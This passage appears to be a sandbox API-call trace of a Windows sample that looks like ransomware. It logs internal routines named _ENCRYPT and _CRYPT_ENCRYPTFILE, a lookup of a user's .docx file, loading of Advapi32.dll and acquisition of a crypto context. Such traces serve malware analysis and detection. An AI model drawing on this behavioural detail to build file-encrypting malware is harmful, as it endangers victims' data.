RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0175.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0175.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0175.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0175.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0175.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0175.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0175.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0175.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0175.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0175.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0175.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0175.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0175.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0175.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0175.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0175.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0175.804] FreeLibrary (hLibModule=0x75990000) returned 1 [0175.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0175.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0175.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0175.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0175.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0175.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0175.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0175.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0175.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0175.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0175.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0175.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0175.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0175.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0175.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0175.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.805] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0175.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0175.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0175.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0175.805] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0175.805] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0175.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0175.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0175.805] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0175.805] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0175.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0175.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0175.805] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0175.805] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0175.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0175.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0175.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0175.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0175.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0175.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0175.806] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0175.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0175.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0175.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0175.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0175.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0175.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0175.806] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0175.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0175.806] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.806] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa71df400, ftCreationTime.dwHighDateTime=0x1d5e683, ftLastAccessTime.dwLowDateTime=0xba16f910, ftLastAccessTime.dwHighDateTime=0x1d59824, ftLastWriteTime.dwLowDateTime=0xba16f910, ftLastWriteTime.dwHighDateTime=0x1d59824, nFileSizeHigh=0x0, nFileSizeLow=0x6cc4, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="oLilEMGSHp90H.docx", cAlternateFileName="OLILEM~1.DOC")) returned 0x90add8 [0175.808] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0175.808] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.808] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa71df400, ftCreationTime.dwHighDateTime=0x1d5e683, ftLastAccessTime.dwLowDateTime=0xba16f910, ftLastAccessTime.dwHighDateTime=0x1d59824, ftLastWriteTime.dwLowDateTime=0xba16f910, ftLastWriteTime.dwHighDateTime=0x1d59824, nFileSizeHigh=0x0, nFileSizeLow=0x6cc4, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="oLilEMGSHp90H.docx", cAlternateFileName="OLILEM~1.DOC")) returned 0x90add8 [0175.808] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0175.808] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.810] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.810] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.810] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.810] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.810] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.810] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.810] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.810] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.810] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.810] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.810] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.810] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.810] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.810] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.810] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.810] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ilEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.810] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lEMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.810] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0175.810] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MGSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.810] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GSHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.810] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SHp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.810] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hp90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.810] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p90H.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0175.810] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.810] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0175.811] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0175.811] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0175.811] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.811] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.811] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.811] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.811] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0175.811] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0175.811] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0175.811] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0175.811] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0175.811] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.811] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa71df400, ftCreationTime.dwHighDateTime=0x1d5e683, ftLastAccessTime.dwLowDateTime=0xba16f910, ftLastAccessTime.dwHighDateTime=0x1d59824, ftLastWriteTime.dwLowDateTime=0xba16f910, ftLastWriteTime.dwHighDateTime=0x1d59824, nFileSizeHigh=0x0, nFileSizeLow=0x6cc4, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="oLilEMGSHp90H.docx", cAlternateFileName="OLILEM~1.DOC")) returned 0x90af58 [0175.811] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0175.811] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.812] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0175.812] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.812] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0175.812] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0175.812] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.812] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0175.812] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.812] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.812] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0175.812] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0175.812] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0175.812] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.812] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.852] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.852] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0175.852] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.852] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0175.854] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.854] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.854] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0175.854] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0175.854] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0175.854] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.854] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.854] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.854] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0175.854] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, 